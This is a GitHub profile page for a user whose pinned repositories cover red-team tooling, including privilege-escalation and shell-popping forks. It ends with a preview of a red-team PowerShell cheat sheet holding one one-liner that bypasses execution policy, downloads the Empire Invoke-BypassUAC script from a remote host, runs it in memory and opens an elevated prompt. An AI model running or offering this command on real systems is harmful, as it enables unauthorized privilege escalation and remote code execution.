Skip to content
View timmytr1ll's full-sized avatar
💭
What It Do
💭
What It Do

Block or report timmytr1ll

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. TRILL-OSCP TRILL-OSCP Public

    super cool l33t hacks

    C 1 2

  2. Awesome-Red-Teaming Awesome-Red-Teaming Public

    Forked from yeyintminthuhtut/Awesome-Red-Teaming

    List of Awesome Red Teaming Resources

    1

  3. BeRoot BeRoot Public

    Forked from AlessandroZ/BeRoot

    Privilege Escalation Project - Windows / Linux / Mac

    Python 1

  4. Red-Teaming-Toolkit Red-Teaming-Toolkit Public

    Forked from infosecn1nja/Red-Teaming-Toolkit

    A collection of open source and commercial tools that aid in red team operations.

    1

  5. ShellPop ShellPop Public

    Forked from 0x00-0x00/ShellPop

    Pop shells like a master.

    Python 1

  6. RedTeam_CheatSheet.ps1 RedTeam_CheatSheet.ps1
    1
    # Description: 
    2
    #    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
    3
    
    
    4
    # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
    5
    powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"